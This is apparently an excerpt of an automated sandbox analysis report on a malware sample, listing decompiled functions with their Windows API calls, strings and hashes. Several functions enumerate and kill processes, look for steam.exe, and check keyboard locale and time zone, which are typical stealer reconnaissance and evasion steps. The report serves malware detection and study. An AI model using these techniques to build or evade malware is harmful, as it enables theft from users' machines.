                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: 29f1747a0aeb511bce0e6638d0f20a21b94ea7081031839af1fc863162c12641
                          • Instruction ID: 5e68ad8adc9436f116080fedb747315bd95b27c2a98f4fca25dd60b753858c95
                          • Opcode Fuzzy Hash: 29f1747a0aeb511bce0e6638d0f20a21b94ea7081031839af1fc863162c12641
                          • Instruction Fuzzy Hash: C1411C72625655CBCB22AF6CDD8DA9E77E4AF14300F049224BC5AA7193CF78DC468B90
                          Function 007246A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007246B9
                          • Process32First.KERNEL32(00000000,00000128), ref: 007246C9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007246DB
                          • StrCmpCA.SHLWAPI(?,?), ref: 007246ED
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00724702
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00724711
                          • CloseHandle.KERNEL32(00000000), ref: 00724718
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00724726
                          • CloseHandle.KERNEL32(00000000), ref: 00724731
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 5f1d849d7a37e6631adbb7ee4f3aee15037f6eb414797b7157b40fd3416e02c7
                          • Instruction ID: 60d0e14127ef6fad3d62a24d34504a69cdcefb2c3ebf11413db59666f64fd9f3
                          • Opcode Fuzzy Hash: 5f1d849d7a37e6631adbb7ee4f3aee15037f6eb414797b7157b40fd3416e02c7
                          • Instruction Fuzzy Hash: 7801F9316152246BE7205B60EC8CFFF377CEB45B01F000088F905D2180EFB499409FA0
                          Function 00ABF312 Relevance: 12.9, Strings: 9, Instructions: 1620COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %C_$){]o$){]o$3;$>}_$I,o$d6/$iKx#$m{
                          • API String ID: 0-2305312169
                          • Opcode ID: 065c0bb1f2d4c90ad71b126cdeac3bae054c41fe4f742fd3e92110acef196313
                          • Instruction ID: 93b570bca4b7dd5fe2bc85ec05f8d43e76f09e0114c8080cc3bf5d086cd613c4
                          • Opcode Fuzzy Hash: 065c0bb1f2d4c90ad71b126cdeac3bae054c41fe4f742fd3e92110acef196313
                          • Instruction Fuzzy Hash: C9B218F3A0C2009FE3046E2DEC8567ABBE5EF94720F1A493DE6C4C7744EA3598458697
                          Function 00724610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00724628
                          • Process32First.KERNEL32(00000000,00000128), ref: 00724638
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0072464A
                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00724660
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00724672
                          • CloseHandle.KERNEL32(00000000), ref: 0072467D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                          • String ID: steam.exe
                          • API String ID: 2284531361-2826358650
                          • Opcode ID: db368331a64c1d45f3f3830ad5324ad08fc411d4f1e145ca415cfa43a1510a4c
                          • Instruction ID: 1fbd045c27c1d249a8000e0ab878e9a1c272a515cf6eff0cd2268bfc679f36ab
                          • Opcode Fuzzy Hash: db368331a64c1d45f3f3830ad5324ad08fc411d4f1e145ca415cfa43a1510a4c
                          • Instruction Fuzzy Hash: FB0162716152249BE7209B60AC89FEB77BCEF09750F0401D5F908D1040EFB899949FE5
                          Function 00714B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00714B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00714B7F
                          • lstrlen.KERNEL32(00734CA8), ref: 00714B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714BA7
                          • lstrcat.KERNEL32(00000000,00734CA8), ref: 00714BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00714BFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID:
                          • API String ID: 2567437900-0
                          • Opcode ID: a04763af84a1ee2b2374d11f3eb6fab13f7322f6927abf8f39ad8721b78ecfaa
                          • Instruction ID: 6eb6e127f2f18a2eaf22e58d46b66e99ecbf72ee22cf569bc4f439f2de74e5b2
                          • Opcode Fuzzy Hash: a04763af84a1ee2b2374d11f3eb6fab13f7322f6927abf8f39ad8721b78ecfaa
                          • Instruction Fuzzy Hash: B731FDB2629515DBC732EF6CED8DB9E77F5AF50700F005224B805A7292CB78EC468B90
                          Function 00AB88A3 Relevance: 11.6, Strings: 8, Instructions: 1585COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ;f$;f$@;$Aow/$e}$s!~$S}$y?
                          • API String ID: 0-3189201537
                          • Opcode ID: 9e0dd72a16a71ebfed79bb343aec5ab3ce1e0ad6848f20ae7fa88d55030dfb28
                          • Instruction ID: a94c0cadafafafdc5fb71e0c584cdf48fed10192b620f63deeec17d48dcb409b
                          • Opcode Fuzzy Hash: 9e0dd72a16a71ebfed79bb343aec5ab3ce1e0ad6848f20ae7fa88d55030dfb28
                          • Instruction Fuzzy Hash: 97B227F3A0C2009FE304AF29EC8567ABBE9EF94320F16493DEAC5C7744E63558458697
                          Function 00722D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 007271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007271FE
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00722D9B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00722DAD
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00722DBA
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00722DEC
                          • LocalFree.KERNEL32(00000000), ref: 00722FCA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: bc0e412b7dccd33f9ebc4157dee962da64eee3e01f55eba983b746501305c313
                          • Instruction ID: e9cbb1fec259b01401f1ca0659c88dc096a686a1a39f3dd78ef2dfa8871c744d
                          • Opcode Fuzzy Hash: bc0e412b7dccd33f9ebc4157dee962da64eee3e01f55eba983b746501305c313
                          • Instruction Fuzzy Hash: D8B13A70904224DFC714CF58D988B99B7F1FB44324F2AC1A9D409AB2A2D77ADD82DF90
                          Function 00AC42DF Relevance: 10.4, Strings: 7, Instructions: 1609COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: w^$AW+$I!}$oX};$7w}$iC^$iC^
                          • API String ID: 0-575452492
                          • Opcode ID: 6f157ea328204272279c26c21d1f43405f399aa92030b4cdf75a2c48cec40abe
                          • Instruction ID: 6cb2b55797974a45f8de61f1e2d9f9ca4b5c8d3f75ea5b03348487a1a1ca5ca5
                          • Opcode Fuzzy Hash: 6f157ea328204272279c26c21d1f43405f399aa92030b4cdf75a2c48cec40abe
                          • Instruction Fuzzy Hash: A7B2C4F36082049FD3046E2DEC8567AFBE9EF94720F1A893DEAC4C3744E63598458697
                          Function 00722C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00722C42
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00722C49
                          • GetTimeZoneInformation.KERNEL32(?), ref: 00722C58
                          • wsprintfA.USER32 ref: 00722C83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID: wwww
                          • API String ID: 3317088062-671953474
                          • Opcode ID: b65988c978f4db483642dfc093c129e7a4f108cec8271c3919904b22d1854a54
                          • Instruction ID: b117a25a76ef81b7ee93c667d9a5ff835cc9cba91d2820d1a1ca764a15f37045
                          • Opcode Fuzzy Hash: b65988c978f4db483642dfc093c129e7a4f108cec8271c3919904b22d1854a54
                          • Instruction Fuzzy Hash: E6012BB1A08614BBD71C8F58DC4AF6EB76DEB84721F004329F916D73C0D7B419008AE1
                          Function 00AB36CC Relevance: 7.9, Strings: 5, Instructions: 1610COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: S,$&6n$1p]_$i_+$nT}
                          • API String ID: 0-1527508719
                          • Opcode ID: 103967cf9986499eeedfeea5169c3ca4fc170ca5e02c18b0e5facc93a27a3856
                          • Instruction ID: 872aa2d9a7eb5c0a2c3913019574af5371948a6fb1ce8e1e43f3c88173595737
                          • Opcode Fuzzy Hash: 103967cf9986499eeedfeea5169c3ca4fc170ca5e02c18b0e5facc93a27a3856
                          • Instruction Fuzzy Hash: 33B2F5F3A0C2009FD704AE2DEC8567ABBE9EF94720F16893DEAC5C3744E63558058697
                          Function 00AC28B0 Relevance: 7.8, Strings: 5, Instructions: 1563COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
